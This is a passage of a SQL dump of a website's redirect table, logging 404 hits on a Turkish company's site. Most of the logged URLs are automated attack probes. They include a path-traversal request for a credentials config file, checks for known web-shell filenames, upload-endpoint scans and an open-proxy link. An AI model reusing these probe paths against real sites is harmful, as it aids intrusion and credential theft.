00:00:00',301),(34463,'http://www.3s-technologies.com.tr/tr/admin/webuploader/server/preview.php',NULL,'http://www.3s-technologies.com.tr/admin/webuploader/server/preview.php','',1,0,'2024-04-11 06:46:59','0000-00-00 00:00:00',301),(34464,'http://www.3s-technologies.com.tr/tr/lib/webuploader/server/preview.php',NULL,'http://www.3s-technologies.com.tr/lib/webuploader/server/preview.php','',1,0,'2024-04-11 06:47:00','0000-00-00 00:00:00',301),(34465,'http://www.3s-technologies.com.tr/tr/webuploader/server/preview.php',NULL,'http://www.3s-technologies.com.tr/webuploader/server/preview.php','',1,0,'2024-04-11 06:47:01','0000-00-00 00:00:00',301),(34466,'http://www.3s-technologies.com.tr/tr/admin/lib/webuploader/server/preview.php',NULL,'http://www.3s-technologies.com.tr/admin/lib/webuploader/server/preview.php','',1,0,'2024-04-11 06:47:02','0000-00-00 00:00:00',301),(34467,'http://www.3s-technologies.com.tr/tr/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:47:04','0000-00-00 00:00:00',301),(34468,'http://www.3s-technologies.com.tr/tr/admin/hui/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/admin/hui/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:47:06','0000-00-00 00:00:00',301),(34469,'http://www.3s-technologies.com.tr/tr/admin/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/admin/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:47:13','0000-00-00 00:00:00',301),(34470,'http://www.3s-technologies.com.tr/tr/static/admin/hui/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/static/admin/hui/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:47:14','0000-00-00 00:00:00',301),(34471,'http://www.3s-technologies.com.tr/tr/public/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/Public/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:47:15','0000-00-00 00:00:00',301),(34472,'http://www.3s-technologies.com.tr/tr/public/static/admin/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/public/static/admin/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:47:17','0000-00-00 00:00:00',301),(34473,'http://www.3s-technologies.com.tr/tr/static/hui/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/static/hui/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:47:19','0000-00-00 00:00:00',301),(34474,'http://www.3s-technologies.com.tr/tr/public/static/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/public/static/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:47:21','0000-00-00 00:00:00',301),(34475,'http://www.3s-technologies.com.tr/tr/public/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/Public/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:47:27','0000-00-00 00:00:00',301),(34476,'http://www.3s-technologies.com.tr/tr/static/admin/lib/webuploader/0.1.5/server/preview.php',NULL,'http://www.3s-technologies.com.tr/static/admin/lib/webuploader/0.1.5/server/preview.php','',1,0,'2024-04-11 06:47:28','0000-00-00 00:00:00',301),(34477,'http://www.3s-technologies.com.tr/tr/public/admin/webuploader/server/preview.php',NULL,'http://www.3s-technologies.com.tr/Public/admin/webuploader/server/preview.php','',1,0,'2024-04-11 06:47:30','0000-00-00 00:00:00',301),(34478,'http://www.3s-technologies.com.tr/tr/fix/public/webuploader/server/preview.php',NULL,'http://www.3s-technologies.com.tr/fix/Public/Webuploader/server/preview.php','',1,0,'2024-04-11 06:47:31','0000-00-00 00:00:00',301),(34479,'https://3s-technologies.com.tr/tr/sellers.json',NULL,'','',3,0,'2024-04-12 01:23:55','0000-00-00 00:00:00',301),(34480,'http://www.3s-technologies.com.tr/tr/admin/_manager/aspcms_manager.asp',NULL,'http://www.3s-technologies.com.tr/admin/_Manager/AspCms_Manager.asp','',3,0,'2024-04-12 02:00:42','0000-00-00 00:00:00',301),(34481,'http://3s-technologies.com.tr/tr/wp-content/plugins/backup-backup/modules/gdrivebanner/assets/css/styles.css',NULL,'','',1,0,'2024-04-12 16:46:06','0000-00-00 00:00:00',301),(34482,'https://3s-technologies.com.tr/tr/chosen.php',NULL,'https://3s-technologies.com.tr/chosen.php','',4,0,'2024-04-13 05:14:58','0000-00-00 00:00:00',301),(34483,'http://www.3s-technologies.com.tr/tr/install/index.asp',NULL,'http://www.3s-technologies.com.tr/install/index.asp','',1,0,'2024-04-17 03:50:17','0000-00-00 00:00:00',301),(34484,'http://3s-technologies.com.tr/en/images/toggige-arrow.jpg',NULL,'3s-technologies.com.tr','',1,0,'2024-04-17 15:48:02','0000-00-00 00:00:00',301),(34485,'https://www.3s-technologies.com.tr/en/joomla/images/pdf/r256.pdf',NULL,'','',1,0,'2024-04-20 11:18:34','0000-00-00 00:00:00',301),(34486,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/kopyasä±-gf-12ht.gif',NULL,'https://3s-technologies.com.tr/images/stories/virtuemart/product/kopyas%C3%84%C2%B1-gf-12ht.gif','',9,0,'2024-04-20 21:13:01','0000-00-00 00:00:00',301),(34487,'http://3s-technologies.com.tr/tr/plugins/fields/radio/src/extension/default.php',NULL,'','',3,0,'2024-04-21 10:46:52','0000-00-00 00:00:00',301),(34488,'http://3s-technologies.com.tr/tr/plugins/fields/radio/src/extension/admin.php',NULL,'','',3,0,'2024-04-21 10:47:10','0000-00-00 00:00:00',301),(34489,'http://3s-technologies.com.tr/tr/layouts/plugins/user/profile/fields/class.php',NULL,'','',3,0,'2024-04-21 10:47:25','0000-00-00 00:00:00',301),(34490,'http://3s-technologies.com.tr/tr/layouts/plugins/user/profile/fields/wp-signup.php',NULL,'','',3,0,'2024-04-21 10:47:33','0000-00-00 00:00:00',301),(34491,'http://3s-technologies.com.tr/en/wp-admin/install.php',NULL,'http://3s-technologies.com.tr/wp-admin/install.php','',12,0,'2024-04-21 16:11:29','0000-00-00 00:00:00',301),(34492,'http://3s-technologies.com.tr/en/shop/magmi-importer/web/download_file.php?file=../../app/etc/local.xml',NULL,'','',1,0,'2024-04-23 13:26:10','0000-00-00 00:00:00',301),(34493,'http://3s-technologies.com.tr/en/modules/mod_rebug/library/index.php',NULL,'www.google.com','',12,0,'2024-04-23 22:48:07','0000-00-00 00:00:00',301),(34494,'https://3s-technologies.com.tr/en/modules/mod_rebug/library/index.php',NULL,'www.google.com','',7,0,'2024-04-23 22:48:11','0000-00-00 00:00:00',301),(34495,'http://3s-technologies.com.tr/tr/wp-content/plugins/miniorange-malware-protection/includes/js/phone.js',NULL,'','',2,0,'2024-04-27 07:06:48','0000-00-00 00:00:00',301),(34496,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/kopyasä±-gf-12ht.gif',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/kopyas%C3%84%C2%B1-gf-12ht.gif','',39,0,'2024-04-28 07:43:02','0000-00-00 00:00:00',301),(34497,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/kopyasä±-gf-12ht_300x300.gif',NULL,'https://www.3s-technologies.com.tr/images/stories/virtuemart/product/resized/kopyas%C3%84%C2%B1-gf-12ht_300x300.gif','',73,0,'2024-04-29 01:36:43','0000-00-00 00:00:00',301),(34498,'http://3s-technologies.com.tr/tr/wp-content/plugins/user-registration/assets/css/user-registration.css',NULL,'','',1,0,'2024-04-30 10:25:27','0000-00-00 00:00:00',301),(34499,'http://3s-technologies.com.tr/tr/wp-content/plugins/user-registration/assets/js/frontend/ur-login.js',NULL,'','',1,0,'2024-04-30 10:25:27','0000-00-00 00:00:00',301),(34500,'http://www.3s-technologies.com.tr/tr/custom/index.asp',NULL,'http://www.3s-technologies.com.tr/custom/index.asp','',2,0,'2024-05-02 13:11:06','0000-00-00 00:00:00',301),(34501,'https://mail.3s-technologies.com.tr/en/api/index.php/v1/config/application?public=true',NULL,'','',2,0,'2024-05-04 01:01:17','0000-00-00 00:00:00',301),(34502,'https://www.3s-technologies.com.tr/en/api/index.php/v1/config/application?public=true',NULL,'','',2,0,'2024-05-04 01:08:09','0000-00-00 00:00:00',301),(34503,'http://3s-technologies.com.tr/en/wp-content/wp-cron.php?ac=3',NULL,'www.google.com','',2,0,'2024-05-05 02:00:14','0000-00-00 00:00:00',301),(34504,'https://3s-technologies.com.tr/en/wp-cron.php?ac=3',NULL,'www.google.com','',2,0,'2024-05-05 02:00:22','0000-00-00 00:00:00',301),(34505,'https://3s-technologies.com.tr/en/about.php',NULL,'www.google.com','',17,0,'2024-05-05 02:00:37','0000-00-00 00:00:00',301),(34506,'https://3s-technologies.com.tr/en/wp-includes/wp-cron.php?ac=3',NULL,'www.google.com','',2,0,'2024-05-05 02:00:48','0000-00-00 00:00:00',301),(34507,'http://3s-technologies.com.tr/en/sample.php?pd=1&mapname=ova.html&a=vx000&dstr=@ovatools',NULL,'www.google.com','',2,0,'2024-05-05 02:00:59','0000-00-00 00:00:00',301),(34508,'http://3s-technologies.com.tr/en/wp-content/themes/wp-cron.php?ac=3',NULL,'www.google.com','',1,0,'2024-05-07 00:41:25','0000-00-00 00:00:00',301),(34509,'https://3s-technologies.com.tr/en/wp-content/uploads/wp-cron.php?ac=3',NULL,'www.google.com','',1,0,'2024-05-07 00:41:39','0000-00-00 00:00:00',301),(34510,'http://3s-technologies.com.tr/en/.well-known/wp-cron.php?ac=3',NULL,'www.google.com','',1,0,'2024-05-07 00:42:05','0000-00-00 00:00:00',301),(34511,'https://3s-technologies.com.tr/en/wp-admin/wp-cron.php?ac=3',NULL,'www.google.com','',1,0,'2024-05-07 00:42:28','0000-00-00 00:00:00',301),(34512,'https://3s-technologies.com.tr/en/wp-content/plugins/wp-cron.php?ac=3',NULL,'www.google.com','',1,0,'2024-05-07 00:42:45','0000-00-00 00:00:00',301),(34513,'http://3s-technologies.com.tr/tr/wp-content/plugins/forminator/assets/fonts/wpmudev-plugin-icons.svg',NULL,'','',1,0,'2024-05-07 06:28:49','0000-00-00 00:00:00',301),(34514,'http://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/fancybox/\' (/^https/i.test(window.location.href||',NULL,'http://3s-technologies.com.tr/components/com_virtuemart/assets/js/fancybox/\'+(/^https/i.test(window.location.href||','',1,0,'2024-05-08 11:01:21','0000-00-00 00:00:00',301),(34515,'http://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/fancybox/\' d.href \'',NULL,'http://3s-technologies.com.tr/components/com_virtuemart/assets/js/fancybox/\'+d.href+\'','',1,0,'2024-05-08 20:24:30','0000-00-00 00:00:00',301),(34516,'http://3s-technologies.com.tr/tr/a',NULL,'http://3s-technologies.com.tr/a','',1,0,'2024-05-08 23:24:52','0000-00-00 00:00:00',301),(34517,'https://3s-technologies.com.tr/tr/xmlrpc.php',NULL,'','',13,0,'2024-05-09 04:20:01','0000-00-00 00:00:00',301),(34518,'http://3s-technologies.com.tr/en/shop/magmi/web/download_file.php?file=../../app/etc/local.xml',NULL,'','',1,0,'2024-05-09 08:21:30','0000-00-00 00:00:00',301),(34519,'http://3s-technologies.com.tr/en/proxy.php?link=https://www.mqrjvwam4pfn.com/',NULL,'http://3s-technologies.com.tr/proxy.php?link=https://www.mqrjvwam4pfn.com/','',1,0,'2024-05-09 11:17:40','0000-00-00 00:00:00',301),(34520,'https://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/fancybox/\' d.href \'',NULL,'https://3s-technologies.com.tr/components/com_virtuemart/assets/js/fancybox/\'+d.href+\'','',16,0,'2024-05-09 23:19:55','0000-00-00 00:00:00',301),(34521,'http://3s-technologies.com.tr/en/wp-aa.php',NULL,'www.google.com','',4,0,'2024-05-10 01:48:40','0000-00-00 00:00:00',301),(34522,'https://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/fancybox/\' (/^https/i.test(window.location.href||',NULL,'https://3s-technologies.com.tr/components/com_virtuemart/assets/js/fancybox/\'+(/^https/i.test(window.location.href||','',16,0,'2024-05-10 07:55:29','0000-00-00 00:00:00',301),(34523,'https://www.3s-technologies.com.tr/en/js/filemanager/dialog.php',NULL,'','',2,0,'2024-05-10 16:11:39','0000-00-00 00:00:00',301),(34524,'https://www.3s-technologies.com.tr/en/assets/administrator/filemanager/dialog.php',NULL,'','',2,0,'2024-05-10 16:11:43','0000-00-00 00:00:00',301),(34525,'https://www.3s-technologies.com.tr/en/assets/admin/js/filemanager/dialog.php',NULL,'','',2,0,'2024-05-10 16:11:46','0000-00-00 00:00:00',301),(34526,'https://www.3s-technologies.com.tr/en/assets/plugins/filemanager/dialog.php',NULL,'','',2,0,'2024-05-10 16:11:49','0000-00-00 00:00:00',301),(34527,'https://www.3s-technologies.com.tr/en/assets/filemanager/dialog.php',NULL,'','',2,0,'2024-05-10 16:11:52','0000-00-00 00:00:00',301),(34528,'https://www.3s-technologies.com.tr/en/vendor/laravel-filemanager/js/cropper.min.js',NULL,'','',1,0,'2024-05-11 14:53:43','0000-00-00 00:00:00',301),(34529,'https://3s-technologies.com.tr/en/fckeditor/editor/filemanager/browser/default/browser.html',NULL,'','',2,0,'2024-05-13 19:30:52','0000-00-00 00:00:00',301),(34530,'https://3s-technologies.com.tr/en/js/fckeditor/editor/filemanager/browser/default/browser.html',NULL,'','',1,0,'2024-05-13 19:30:52','0000-00-00 00:00:00',301),(34531,'https://3s-technologies.com.tr/en/admin/fckeditor/editor/filemanager/browser/default/browser.html',NULL,'','',2,0,'2024-05-13 19:30:52','0000-00-00 00:00:00',301),(34532,'https://3s-technologies.com.tr/en/cfide/scripts/ajax/fckeditor/editor/filemanager/browser/default/browser.html',NULL,'','',2,0,'2024-05-13 19:30:53','0000-00-00 00:00:00',301),(34533,'https://3s-technologies.com.tr/en/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html',NULL,'','',2,0,'2024-05-13 19:30:54','0000-00-00 00:00:00',301),(34534,'https://3s-technologies.com.tr/en/sites/all/libraries/fckeditor/editor/filemanager/browser/default/browser.html',NULL,'','',1,0,'2024-05-13 19:30:54','0000-00-00 00:00:00',301),(34535,'http://3s-technologies.com.tr/tr/wp-content/plugins/startklar-elmentor-forms-extwidgets/assets/dropzone/basic.css',NULL,'','',2,0,'2024-05-14 07:41:06','0000-00-00 00:00:00',301),(34536,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-ver.php',NULL,'www.google.com','',7,0,'2024-05-15 01:38:51','0000-00-00 00:00:00',301),(34537,'https://3s-technologies.com.tr/en/checkbex.php',NULL,'www.google.com','',1,0,'2024-05-15 01:39:15','0000-00-00 00:00:00',301),(34538,'https://3s-technologies.com.tr/en/wp-content/plugins/wp-config-sample.php',NULL,'www.google.com','',1,0,'2024-05-15 01:39:28','0000-00-00 00:00:00',301),(34539,'https://3s-technologies.com.tr/en/wp-ver.php',NULL,'www.google.com','',3,0,'2024-05-15 01:40:03','0000-00-00 00:00:00',301),(34540,'https://3s-technologies.com.tr/wp-term.php',NULL,'www.google.com','',1,0,'2024-05-15 01:40:17','0000-00-00 00:00:00',301),(34541,'http://3s-technologies.com.tr/tr/wp-content/plugins/litespeed-cache/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/litespeed-cache/readme.txt','',64,0,'2024-05-16 11:01:35','0000-00-00 00:00:00',301),(34542,'http://3s-technologies.com.tr/tr/public/javascript/filemanager/dialog.php',NULL,'','',1,0,'2024-05-16 15:27:46','0000-00-00 00:00:00',301),(34543,'http://3s-technologies.com.tr/tr/class/phpformbuilder/plugins/filemanager/dialog.php',NULL,'','',1,0,'2024-05-16 15:27:51','0000-00-00 00:00:00',301),(34544,'http://3s-technologies.com.tr/en/wp-content/themes/travelscape/json.php',NULL,'www.google.com','',6,0,'2024-05-17 01:47:59','0000-00-00 00:00:00',301),(34545,'https://3s-technologies.com.tr/en/wp-content/themes/aahana/json.php',NULL,'www.google.com','',2,0,'2024-05-17 01:48:00','0000-00-00 00:00:00',301),(34546,'http://3s-technologies.com.tr/en/wp-content/themes/travel/issue.php',NULL,'www.google.com','',4,0,'2024-05-17 01:48:00','0000-00-00 00:00:00',301),(34547,'https://3s-technologies.com.tr/en/wp-content/themes/digital-download/new.php',NULL,'www.google.com','',2,0,'2024-05-17 01:48:02','0000-00-00 00:00:00',301),(34548,'http://3s-technologies.com.tr/en/epinyins.php',NULL,'www.google.com','',4,0,'2024-05-17 01:48:02','0000-00-00 00:00:00',301),(34549,'https://3s-technologies.com.tr/en/wp-admin/dropdown.php',NULL,'www.google.com','',2,0,'2024-05-17 01:48:02','0000-00-00 00:00:00',301),(34550,'https://3s-technologies.com.tr/en/wp-content/plugins/dummyyummy/wp-signup.php',NULL,'www.google.com','',2,0,'2024-05-17 01:48:03','0000-00-00 00:00:00',301),(34551,'http://www.3s-technologies.com.tr/tr/a',NULL,'http://www.3s-technologies.com.tr/a','',1,0,'2024-05-17 04:51:14','0000-00-00 00:00:00',301),(34552,'http://3s-technologies.com.tr/tr/function.php',NULL,'http://3s-technologies.com.tr/function.php','',201,0,'2024-05-17 12:38:01','0000-00-00 00:00:00',301),(34553,'http://3s-technologies.com.tr/tr/mah.php',NULL,'http://3s-technologies.com.tr/mah.php','',213,0,'2024-05-17 12:38:03','0000-00-00 00:00:00',301),(34554,'http://3s-technologies.com.tr/tr/wp-admin/images/install.php',NULL,'http://3s-technologies.com.tr/wp-admin/images/install.php','',76,0,'2024-05-17 12:38:03','0000-00-00 00:00:00',301),(34555,'http://3s-technologies.com.tr/tr/wp-includes/mah.php',NULL,'http://3s-technologies.com.tr/wp-includes/mah.php','',38,0,'2024-05-17 12:38:05','0000-00-00 00:00:00',301),(34556,'http://3s-technologies.com.tr/tr/wp-content/mah.php',NULL,'http://3s-technologies.com.tr/wp-content/mah.php','',33,0,'2024-05-17 12:38:07','0000-00-00 00:00:00',301),(34557,'http://3s-technologies.com.tr/tr/web.php',NULL,'http://3s-technologies.com.tr/web.php','',55,0,'2024-05-17 12:38:08','0000-00-00 00:00:00',301),(34558,'http://3s-technologies.com.tr/tr/wp-content/upgrade/about.php',NULL,'http://3s-technologies.com.tr/wp-content/upgrade/about.php','',126,0,'2024-05-17 12:38:10','0000-00-00 00:00:00',301),(34559,'http://3s-technologies.com.tr/tr/wp-content/themes/twentyfive/include.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/twentyfive/include.php','',30,0,'2024-05-17 12:38:10','0000-00-00 00:00:00',301),(34560,'http://3s-technologies.com.tr/tr/wp-content/upgrade/cloud.php',NULL,'http://3s-technologies.com.tr/wp-content/upgrade/cloud.php','',1,0,'2024-05-17 12:38:18','0000-00-00 00:00:00',301),(34561,'http://3s-technologies.com.tr/tr/wp-content/plugins/linkpreview/index.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/linkpreview/index.php','',62,0,'2024-05-17 12:38:21','0000-00-00 00:00:00',301),(34562,'http://3s-technologies.com.tr/tr/sts.php',NULL,'http://3s-technologies.com.tr/sts.php','',53,0,'2024-05-17 12:38:22','0000-00-00 00:00:00',301),(34563,'http://3s-technologies.com.tr/tr/wp-includes/install.php',NULL,'http://3s-technologies.com.tr/wp-includes/install.php','',52,0,'2024-05-17 12:38:23','0000-00-00 00:00:00',301),(34564,'http://3s-technologies.com.tr/tr/amaxx.php',NULL,'http://3s-technologies.com.tr/amaxx.php','',8,0,'2024-05-17 12:38:25','0000-00-00 00:00:00',301),(34565,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-page-icon.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-wp-page-icon.php','',1,0,'2024-05-17 12:38:31','0000-00-00 00:00:00',301),(34566,'http://3s-technologies.com.tr/tr/.well-known/plugins.php',NULL,'http://3s-technologies.com.tr/.well-known/plugins.php','',6,0,'2024-05-17 12:38:33','0000-00-00 00:00:00',301),(34567,'http://3s-technologies.com.tr/tr/wp-content/item.php',NULL,'http://3s-technologies.com.tr/wp-content/item.php','',22,0,'2024-05-17 12:38:34','0000-00-00 00:00:00',301),(34568,'http://3s-technologies.com.tr/tr/wp-content/uploads/zcache.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/zcache.php','',1,0,'2024-05-17 12:38:34','0000-00-00 00:00:00',301),(34569,'http://3s-technologies.com.tr/tr/wp-includes/ixr/class-ixr-http.php',NULL,'http://3s-technologies.com.tr/wp-includes/IXR/class-IXR-http.php','',1,0,'2024-05-17 12:38:35','0000-00-00 00:00:00',301),(34570,'http://3s-technologies.com.tr/tr/jetpack.php',NULL,'http://3s-technologies.com.tr/jetpack.php','',1,0,'2024-05-17 12:38:37','0000-00-00 00:00:00',301),(34571,'http://3s-technologies.com.tr/tr/wp-includes/ixr/class-ixr-data.php',NULL,'http://3s-technologies.com.tr/wp-includes/IXR/class-IXR-data.php','',1,0,'2024-05-17 12:38:42','0000-00-00 00:00:00',301),(34572,'http://3s-technologies.com.tr/tr/wsoenigma.php',NULL,'http://3s-technologies.com.tr/WSOEnigma.php','',26,0,'2024-05-17 12:38:44','0000-00-00 00:00:00',301),(34573,'http://3s-technologies.com.tr/tr/wp-includes/wso112233.php',NULL,'http://3s-technologies.com.tr/wp-includes/wso112233.php','',1,0,'2024-05-17 12:38:45','0000-00-00 00:00:00',301),(34574,'http://3s-technologies.com.tr/tr/wp-includes/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-includes/wp-login.php','',30,0,'2024-05-17 12:38:47','0000-00-00 00:00:00',301),(34575,'http://3s-technologies.com.tr/tr/wp-content/themes/sketch/404.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/sketch/404.php','',57,0,'2024-05-17 12:38:49','0000-00-00 00:00:00',301),(34576,'http://3s-technologies.com.tr/tr/wp-includes/text/themes.php',NULL,'http://3s-technologies.com.tr/wp-includes/Text/themes.php','',2,0,'2024-05-17 12:38:50','0000-00-00 00:00:00',301),(34577,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/atomlib.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/blue/atomlib.php','',77,0,'2024-05-17 12:38:53','0000-00-00 00:00:00',301),(34578,'http://3s-technologies.com.tr/tr/wp-content/themes/calmly/issue.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/calmly/issue.php','',2,0,'2024-05-17 12:38:56','0000-00-00 00:00:00',301),(34579,'http://3s-technologies.com.tr/tr/wp-admin/network/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-admin/network/wp-login.php','',9,0,'2024-05-17 12:38:57','0000-00-00 00:00:00',301),(34580,'http://3s-technologies.com.tr/tr/wp-includes/pomo/pomo.php',NULL,'http://3s-technologies.com.tr/wp-includes/pomo/pomo.php','',15,0,'2024-05-17 12:38:59','0000-00-00 00:00:00',301),(34581,'http://3s-technologies.com.tr/tr/wp-includes/class-matchesmapregex-error-comment.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-matchesmapregex-error-comment.php','',1,0,'2024-05-17 12:39:00','0000-00-00 00:00:00',301),(34582,'http://3s-technologies.com.tr/tr/web/wp-content/plugins/backup-backup/includes/wp.php',NULL,'http://3s-technologies.com.tr/web/wp-content/plugins/backup-backup/includes/wp.php','',1,0,'2024-05-17 12:39:03','0000-00-00 00:00:00',301),(34583,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/install.php',NULL,'http://3s-technologies.com.tr/.well-known/acme-challenge/install.php','',19,0,'2024-05-17 12:39:04','0000-00-00 00:00:00',301),(34584,'http://3s-technologies.com.tr/tr/edit.php',NULL,'http://3s-technologies.com.tr/edit.php','',447,0,'2024-05-17 12:39:08','0000-00-00 00:00:00',301),(34585,'http://3s-technologies.com.tr/tr/wp-includes/new.php',NULL,'http://3s-technologies.com.tr/wp-includes/new.php','',1,0,'2024-05-17 12:39:11','0000-00-00 00:00:00',301),(34586,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/atomlib.php',NULL,'http://3s-technologies.com.tr/.well-known/acme-challenge/atomlib.php','',11,0,'2024-05-17 12:39:11','0000-00-00 00:00:00',301),(34587,'http://3s-technologies.com.tr/tr/wp-includes/pomo/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-includes/pomo/wp-login.php','',30,0,'2024-05-17 12:39:14','0000-00-00 00:00:00',301),(34588,'http://3s-technologies.com.tr/tr/wp-content/languages/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-content/languages/wp-login.php','',61,0,'2024-05-17 12:39:14','0000-00-00 00:00:00',301),(34589,'http://3s-technologies.com.tr/tr/wp-includes/class-wp-session-json.php',NULL,'http://3s-technologies.com.tr/wp-includes/class-wp-session-json.php','',1,0,'2024-05-17 12:39:18','0000-00-00 00:00:00',301),(34590,'http://3s-technologies.com.tr/tr/.tmb/cloud.php',NULL,'http://3s-technologies.com.tr/.tmb/cloud.php','',32,0,'2024-05-17 12:39:19','0000-00-00 00:00:00',301),(34591,'http://3s-technologies.com.tr/tr/enigma.php?key=enigmacybersecurity',NULL,'http://3s-technologies.com.tr/Enigma.php?key=EnigmaCyberSecurity','',1,0,'2024-05-17 12:39:23','0000-00-00 00:00:00',301),(34592,'http://3s-technologies.com.tr/tr/wp-includes/theme-compat/wp-login.php',NULL,'http://3s-technologies.com.tr/wp-includes/theme-compat/wp-login.php','',66,0,'2024-05-17 12:39:24','0000-00-00 00:00:00',301),(34593,'http://3s-technologies.com.tr/tr/wp-content/uploads/koheju.php',NULL,'http://3s-technologies.com.tr/wp-content/uploads/koheju.php','',1,0,'2024-05-17 12:39:28','0000-00-00 00:00:00',301),(34594,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/renderer/content.php',NULL,'http://3s-technologies.com.tr/wp-includes/Text/Diff/Renderer/content.php','',1,0,'2024-05-17 12:39:31','0000-00-00 00:00:00',301),(34595,'http://3s-technologies.com.tr/tr/wp-admin/images/mhbgf.php',NULL,'http://3s-technologies.com.tr/wp-admin/images/Mhbgf.php','',13,0,'2024-05-17 12:39:31','0000-00-00 00:00:00',301),(34596,'http://3s-technologies.com.tr/tr/.well-known/radio.php',NULL,'http://3s-technologies.com.tr/.well-known/radio.php','',38,0,'2024-05-17 12:39:36','0000-00-00 00:00:00',301),(34597,'http://3s-technologies.com.tr/tr/wp-content/classwithtostring.php',NULL,'http://3s-technologies.com.tr/wp-content/classwithtostring.php','',36,0,'2024-05-17 12:39:37','0000-00-00 00:00:00',301),(34598,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/coffee/index.php/wp-admin/images/mhbgf.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/coffee/index.php/wp-admin/images/Mhbgf.php','',1,0,'2024-05-17 12:39:38','0000-00-00 00:00:00',301),(34599,'http://3s-technologies.com.tr/tr/plugins/jquery.filer/uploads/jack2024.p.php',NULL,'http://3s-technologies.com.tr/plugins/jquery.filer/uploads/jack2024.p.php','',1,0,'2024-05-17 12:39:38','0000-00-00 00:00:00',301),(34600,'http://3s-technologies.com.tr/tr/huehue.php',NULL,'http://3s-technologies.com.tr/huehue.php','',1,0,'2024-05-17 12:39:40','0000-00-00 00:00:00',301),(34601,'http://3s-technologies.com.tr/tr/wp-content/install.php',NULL,'http://3s-technologies.com.tr/wp-content/install.php','',63,0,'2024-05-17 12:39:41','0000-00-00 00:00:00',301),(34602,'http://3s-technologies.com.tr/tr/.well-known/autoload_classmap.php',NULL,'http://3s-technologies.com.tr/.well-known/autoload_classmap.php','',16,0,'2024-05-17 12:39:41','0000-00-00 00:00:00',301),(34603,'http://3s-technologies.com.tr/tr/njima.php',NULL,'http://3s-technologies.com.tr/Njima.php','',14,0,'2024-05-17 12:39:44','0000-00-00 00:00:00',301),(34604,'http://3s-technologies.com.tr/tr/wp-admin/images/wp-signup.php',NULL,'http://3s-technologies.com.tr/wp-admin/images/wp-signup.php','',15,0,'2024-05-17 12:39:48','0000-00-00 00:00:00',301),(34605,'http://3s-technologies.com.tr/tr/wp-content/bypass.php',NULL,'http://3s-technologies.com.tr/wp-content/bypass.php','',1,0,'2024-05-17 12:39:49','0000-00-00 00:00:00',301),(34606,'http://3s-technologies.com.tr/tr/wp-includes/xx.php',NULL,'http://3s-technologies.com.tr/wp-includes/xx.php','',2,0,'2024-05-17 12:39:51','0000-00-00 00:00:00',301),(34607,'http://3s-technologies.com.tr/tr/wp-content/mari.php',NULL,'http://3s-technologies.com.tr/wp-content/mari.php','',1,0,'2024-05-17 12:39:52','0000-00-00 00:00:00',301),(34608,'http://3s-technologies.com.tr/tr/style2.php',NULL,'http://3s-technologies.com.tr/style2.php','',11,0,'2024-05-17 12:39:57','0000-00-00 00:00:00',301),(34609,'http://3s-technologies.com.tr/tr/mc.php',NULL,'http://3s-technologies.com.tr/mc.php','',3,0,'2024-05-17 12:39:59','0000-00-00 00:00:00',301),(34610,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/light/about.php',NULL,'http://3s-technologies.com.tr/wp-admin/css/colors/light/about.php','',41,0,'2024-05-17 12:39:59','0000-00-00 00:00:00',301),(34611,'http://3s-technologies.com.tr/tr/wp-content/bak.php',NULL,'http://3s-technologies.com.tr/wp-content/bak.php','',1,0,'2024-05-17 12:40:01','0000-00-00 00:00:00',301),(34612,'http://3s-technologies.com.tr/tr/wp-admin/ss.php',NULL,'http://3s-technologies.com.tr/wp-admin/ss.php','',1,0,'2024-05-17 12:40:03','0000-00-00 